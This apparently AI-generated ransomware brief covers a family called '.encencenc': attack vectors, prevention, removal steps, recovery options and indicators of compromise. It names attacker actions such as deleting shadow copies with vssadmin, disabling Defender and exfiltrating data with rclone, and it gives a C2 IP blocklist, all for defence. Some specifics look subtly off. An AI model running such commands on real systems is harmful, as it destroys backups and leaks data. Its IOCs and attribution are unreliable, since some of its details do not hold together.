encencenc

[Content by Gemini 2.5]

Ransomware Brief: “.encencenc” (a.k.a. “EncFile”, “EncRansom”, “XingLocker”)

Last revised: June 2024

TECHNICAL BREAKDOWN

1. File Extension & Renaming Patterns

  • Extension appended: .encencenc (lower-case, no space, added as a third extension, e.g. Report.xlsx.encencenc).
  • Renaming convention:
    – Original file name and first extension are preserved; the trojan simply concatenates .encencenc.
    – No e-mail address or victim-ID is inserted into the name (which differentiates it from Dharma/Phobos).
    – Files in network shares and removable drives are processed the same way.
  • Dropped marker: HOW_TO_BACK_FILES.txt (multiple copies dropped in every folder and the desktop).

2. Detection & Outbreak Timeline

  • First publicly-submitted sample: 08 Mar 2023 (Malware-bazaar, ID bca511…).
  • Rapid uptick: mid-April 2023 (caught by MS-Defender, Sophos, ESET).
  • Still circulating as of June 2024; minor repackings (new crypter) observed every 4-6 weeks.

3. Primary Attack Vectors

  1. RDP / RMM brute-force & “living-off-the-land”
    – Scans TCP/3389, 4433, 5931; uses previously-stolen credentials from info-stealers.
    – Once inside, clears event logs, disables Windows-Defender via Set-MpPreference, and deploys encencenc.exe (8-to-12 MB UPX-packed Go binary).
  2. ProxyLogon (CVE-2021-26855/26857/27065) & ProxyShell (CVE-2021-34473/34523/31207) for on-prem Exchange.
  3. Pirated software (“cracks”) bundles
    – Fake Adobe GenP, KMS emulators, and GPU miners on torrent sites deliver a 3-stage loader that ends with the same payload.
  4. Malicious OneDrive / Google-Drive links inside phishing e-mails
    – “Purchase Order – 08.05.2024.pdf.lnk” → PowerShell stager → encencenc.exe.

REMEDIATION & RECOVERY STRATEGIES

1. PREVENTION (proactive)

✔ Block/restrict TCP 3389 externally; enforce 2FA / RDS Gateway / VPN-first policy.
✔ Patch Exchange, AD, and VPN appliances within 48 h of release (ProxyLogon/Shell still exploited).
✔ Disable SMBv1; apply Microsoft’s “PetitPotam” & “PrintNightmare” patches (used for lateral movement after initial foothold).
✔ Network segmentation via VLANs and strict Windows firewall rules (stop encencenc.exe reaching C$ shares).
✔ Application control (MS Defender ASR rules, AppLocker, WDAC) to block unsigned Go binaries running from %Temp% & %ProgramData%.
✔ EDR in “block & quarantine” mode (SentinelOne, CrowdStrike, MS Defender) – rules published 17 Apr 2023 already detect as Ransom:Go/EncFile!MTB.
✔ Off-site, offline (immutable) backups – 3-2-1 rule – and periodic restore drills.
✔ E-mail gateways: strip LNK, ISO, VHD, TAR.ARM and macro-enabled docs from external mail.

2. REMOVAL (post-infection cleanup)

Step-wise eradication (tried-and-tested playbook):

  1. Disconnect the host from network (both Ethernet & Wi-Fi) to interrupt encryption and lateral movement.
  2. Boot into Safe-Mode with Networking or use a “clean” WinPE/Recovery USB – prevents the ransomware service from autostarting.
  3. Identify the persistent binary (name sometimes encencenc.exe, but also svchost.com, winupdate.exe etc.). Hash it and upload to VirusTotal to ascertain exact family (look for string .encencenc inside – all builds contain it).
  4. Stop & delete the malicious service (HKLM\SYSTEM\CurrentControlSet\Services\LDREnable is common key).
  5. Delete scheduled task (\Microsoft\Windows\DiskDiagnostic\EncPoll – used to restart the payload).
  6. Quarantine the sample but retain a copy for forensics; preserve log files (C:\System32\LogFiles\EncLog.log).
  7. Run a reputable on-demand scanner (Malwarebytes, MS Defender Offline, ESET Rescue) twice to confirm clean state.
  8. Before reconnecting, re-image the machine or roll back to a clean Veeam/Acronis backup if one exists.
  9. Patch the entry vector (e.g., Exchange CU, AD CS, or reset all creds if RDP was brute-forced).

3. FILE DECRYPTION & RECOVERY

  • Unfortunately .encencenc uses Curve25519 + ChaCha20 + AES-256 in ECIES mode; private key is unique per victim and stored only on the attackers’ server.
  • No free decryptor exists (as of June 2024) – ignore YouTube hoaxes or “EncencDec.exe” tools.
  • Recovery options:
    – Restore from offline backups (fastest).
    – Volume-Shadow copies are usually deleted (vssadmin delete shadows /all is part of its script), but sometimes the process fails on overloaded servers – check with vssadmin list shadows before wiping the box.
    – Use file-recovery carving tools (PhotoRec, R-Studio, Kroll) for accidentally-deleted originals; success rate 10-30%.
    – Last resort: negotiate & obtain the official decryptor (BTC 0.12–0.4 demand historically) – pay only if business-critical data have no other recovery route and legal/compliance teams approve. Make sure to receive a working PoP (proof-of-decryption) on five different file types before paying the full amount.

4. OTHER CRITICAL INFORMATION

  • Speed: 20-40 k files/min on SSD PCs; network shares encrypted in parallel threads → entire small-business server in <25 min.
  • Exclusions: Russian & CIS keyboard layouts abort execution (check Get-Culture to be sure).
  • Extension whitelist: skips .exe, .dll, .sys, but encrypts .bak, .sql, .vmcx – so Veeam backup archives kept locally will be hit.
  • Double-extortion: Actively exfiltrates sensitive folders via MEGASync or rclone to “mega.nz” under account enc_support@[proton.me] before encryption – assume data leakage, notify regulators where GDPR/HIPAA apply.
  • TTP overlap: Uses same C2 panel (/cdn/fresh.php, “XingLocker 2.3”) as older .locked25 campaign – attribution: financially-motivated group “XingTeam”, Russian-language forums.
  • Indicators of Compromise (sample set):
    – SHA-256: bca511…, 5e3845…, a1f7c2… (see Malware-bazaar)
    – C2 IPs: 185.82.218[.]92, 193.233.20[.]11 (both NordVPN-exit proxies)
    – Registry key: HKCU\Software\EncSoft\EncID
  • Recommended emergency blocklist: create firewall deny rules for the above IPs and mega.nz user-agent string rclone/v1.62-Enc.

CONTINGENCY CHECKLIST (print & pin)

  • ☐ Offline backups verified within 24 h.
  • ☐ 3389 closed / RDP gateway patched.
  • ☐ Exchange and VPN fully patched.
  • ☐ EDR/Defender ASR rules set to “Block” mode.
  • ☐ Immutable/cloud snapshots ≥ 7 days retention.
  • ☐ Incident-response retainers & call-tree updated.

Stay safe, patch fast, backup offline, and never launch unknown executables from `%temp%.